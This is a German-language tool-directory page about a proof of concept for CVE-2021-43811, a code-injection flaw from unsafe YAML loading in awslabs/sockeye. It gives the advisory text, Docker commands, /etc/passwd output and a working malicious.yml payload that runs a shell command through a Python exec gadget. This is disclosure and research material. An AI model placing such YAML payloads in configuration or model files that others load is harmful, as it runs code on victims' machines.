Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-43811 — awslabs/sockeye Code-Injection durch unsicheres YAML-Laden CVE-2021-43811 | Kitploit
Tools/GitHubGitHub/s-index/cve-2021-43811
Payload-GenerierungSchwachstellenanalyseCode-AnalyseExploitationPapers & ForschungLernen & Bildung
GitHubs-index/cve-2021-43811

CVE-2021-43811

awslabs/sockeye Code-Injection durch unsicheres YAML-Laden CVE-2021-43811

Repository anzeigen
2249vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-43811

awslabs/sockeye Code-Injection durch unsicheres YAML-Laden CVE-2021-43811

NVD-Beschreibung

Sockeye ist ein Open-Source-Sequenz-zu-Sequenz-Framework für neuronale maschinelle Übersetzung, das auf PyTorch basiert. Sockeye verwendet YAML, um Modell- und Datenkonfigurationen auf der Festplatte zu speichern. Versionen unter 2.3.24 verwenden unsicheres YAML-Laden, das dazu gebracht werden kann, beliebigen, in Konfigurationsdateien eingebetteten Code auszuführen. Ein Angreifer kann einer Konfigurationsdatei eines trainierten Modells schädlichen Code hinzufügen und versuchen, Benutzer dazu zu bringen, sie herunterzuladen und auszuführen. Wenn Benutzer das Modell ausführen, wird der eingebettete Code lokal ausgeführt. Das Problem ist in Version 2.3.24 behoben.

Demo

cve-2021-43811

Einrichtung

  1. Erstelle ein Image aus einem Dockerfile
root@kitploit:~
docker build -t cve-2021-43811 .
  1. Führe python main.py in einem neuen Container aus
root@kitploit:~
docker run -it --rm cve-2021-43811

Ausgabe /etc/passwd

root@kitploit:~
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

output-image

PoC-Payload

malicious.yml

root@kitploit:~
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"

Referenz

  • https://github.com/awslabs/sockeye/security/advisories/GHSA-ggmr-44cv-24pm
Tool herunterladen